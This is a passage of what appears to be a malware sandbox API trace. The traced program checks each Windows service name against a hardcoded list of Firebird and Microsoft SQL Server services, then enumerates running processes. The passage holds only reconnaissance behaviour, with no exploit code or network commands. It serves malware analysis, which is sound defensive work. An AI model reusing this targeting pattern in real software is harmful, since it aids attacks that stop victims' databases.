(lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0294.370] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0294.370] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0294.371] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0294.371] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0294.371] lstrlenW (lpString="CDPSvc") returned 6 [0294.371] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0294.371] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0294.371] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0294.371] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0294.371] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0294.371] lstrlenW (lpString="ClickToRunSvc") returned 13 [0294.371] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0294.371] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0294.371] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0294.371] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0294.371] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0294.371] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0294.371] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0294.371] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0294.371] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0294.371] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0294.371] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0294.371] lstrlenW (lpString="CryptSvc") returned 8 [0294.371] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0294.371] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0294.371] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0294.371] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0294.371] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0294.372] lstrlenW (lpString="DcomLaunch") returned 10 [0294.372] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0294.372] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0294.372] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0294.372] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0294.372] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0294.372] lstrlenW (lpString="DeviceAssociationService") returned 24 [0294.372] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0294.372] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0294.372] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0294.372] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0294.372] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0294.372] lstrlenW (lpString="Dhcp") returned 4 [0294.372] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0294.372] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0294.372] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0294.372] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0294.372] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0294.372] lstrlenW (lpString="Dnscache") returned 8 [0294.372] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0294.372] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0294.372] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0294.372] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0294.372] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0294.372] lstrlenW (lpString="DPS") returned 3 [0294.373] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0294.373] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0294.373] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0294.373] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0294.373] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0294.373] lstrlenW (lpString="DusmSvc") returned 7 [0294.373] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0294.373] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0294.373] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0294.373] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0294.373] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0294.373] lstrlenW (lpString="EventLog") returned 8 [0294.373] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0294.373] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0294.373] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0294.373] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0294.373] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0294.373] lstrlenW (lpString="EventSystem") returned 11 [0294.373] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0294.373] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0294.373] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0294.373] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0294.373] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0294.373] lstrlenW (lpString="FontCache") returned 9 [0294.374] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0294.374] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0294.374] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0294.374] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0294.374] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0294.374] lstrlenW (lpString="gpsvc") returned 5 [0294.374] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0294.374] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0294.374] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0294.374] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0294.374] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0294.374] lstrlenW (lpString="iphlpsvc") returned 8 [0294.374] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0294.374] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0294.374] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0294.374] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0294.374] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0294.374] lstrlenW (lpString="KeyIso") returned 6 [0294.374] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0294.374] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0294.374] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0294.374] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0294.374] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0294.374] lstrlenW (lpString="LanmanServer") returned 12 [0294.374] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0294.375] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0294.375] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0294.375] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0294.375] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0294.375] lstrlenW (lpString="LanmanWorkstation") returned 17 [0294.375] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0294.375] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0294.375] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0294.375] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0294.375] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0294.375] lstrlenW (lpString="lfsvc") returned 5 [0294.375] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0294.375] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0294.375] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0294.375] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0294.375] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0294.375] lstrlenW (lpString="lmhosts") returned 7 [0294.375] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0294.375] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0294.375] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0294.375] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0294.375] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0294.375] lstrlenW (lpString="LSM") returned 3 [0294.375] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0294.375] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0294.375] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0294.376] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0294.376] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0294.376] lstrlenW (lpString="MpsSvc") returned 6 [0294.376] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0294.376] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0294.376] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0294.376] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0294.376] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0294.376] lstrlenW (lpString="NcbService") returned 10 [0294.376] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0294.376] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0294.376] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0294.376] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0294.376] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0294.376] lstrlenW (lpString="netprofm") returned 8 [0294.376] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0294.376] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0294.376] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0294.376] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0294.376] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0294.376] lstrlenW (lpString="NgcSvc") returned 6 [0294.376] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0294.376] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0294.376] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0294.377] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0294.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0294.377] lstrlenW (lpString="NlaSvc") returned 6 [0294.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0294.377] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0294.377] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0294.377] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0294.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0294.377] lstrlenW (lpString="nsi") returned 3 [0294.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0294.377] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0294.377] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0294.377] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0294.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0294.377] lstrlenW (lpString="PcaSvc") returned 6 [0294.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0294.377] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0294.377] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0294.377] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0294.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0294.377] lstrlenW (lpString="PlugPlay") returned 8 [0294.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0294.377] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0294.377] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0294.377] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0294.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0294.378] lstrlenW (lpString="Power") returned 5 [0294.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0294.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0294.378] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0294.378] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0294.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0294.378] lstrlenW (lpString="ProfSvc") returned 7 [0294.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0294.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0294.378] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0294.378] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0294.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0294.378] lstrlenW (lpString="RpcEptMapper") returned 12 [0294.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0294.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0294.378] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0294.378] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0294.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0294.378] lstrlenW (lpString="RpcSs") returned 5 [0294.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0294.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0294.378] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0294.378] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0294.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0294.379] lstrlenW (lpString="SamSs") returned 5 [0294.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0294.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0294.379] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0294.379] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0294.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0294.379] lstrlenW (lpString="Schedule") returned 8 [0294.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0294.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0294.379] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0294.379] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0294.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0294.379] lstrlenW (lpString="SecurityHealthService") returned 21 [0294.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0294.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0294.379] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0294.379] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0294.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0294.379] lstrlenW (lpString="SENS") returned 4 [0294.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0294.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0294.379] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0294.379] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0294.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0294.380] lstrlenW (lpString="ShellHWDetection") returned 16 [0294.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0294.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0294.380] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0294.380] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0294.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0294.380] lstrlenW (lpString="Spooler") returned 7 [0294.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0294.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0294.380] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0294.380] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0294.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0294.380] lstrlenW (lpString="StateRepository") returned 15 [0294.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0294.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0294.380] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0294.380] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0294.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0294.380] lstrlenW (lpString="SysMain") returned 7 [0294.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0294.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0294.380] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0294.380] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0294.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0294.380] lstrlenW (lpString="SystemEventsBroker") returned 18 [0294.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0294.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0294.381] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0294.381] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0294.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0294.381] lstrlenW (lpString="Themes") returned 6 [0294.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0294.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0294.381] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0294.381] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0294.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0294.381] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0294.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0294.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0294.381] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0294.381] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0294.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0294.381] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0294.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0294.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0294.381] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0294.381] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0294.381] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x401ba18 | out: hHeap=0x470000) returned 1 [0294.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x47c [0294.748] Process32FirstW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.749] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.749] lstrlenW (lpString="System") returned 6 [0294.749] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.750] lstrlenW (lpString="smss.exe") returned 8 [0294.750] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.751] lstrlenW (lpString="csrss.exe") returned 9 [0294.751] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.751] lstrlenW (lpString="wininit.exe") returned 11 [0294.751] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.752] lstrlenW (lpString="csrss.exe") returned 9 [0294.752] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.752] lstrlenW (lpString="winlogon.exe") returned 12 [0294.753] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.753] lstrlenW (lpString="services.exe") returned 12 [0294.753] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.754] lstrlenW (lpString="lsass.exe") returned 9 [0294.754] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0294.755] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0294.755] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0294.755] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0294.755] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.756] lstrlenW (lpString="svchost.exe") returned 11 [0294.756] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 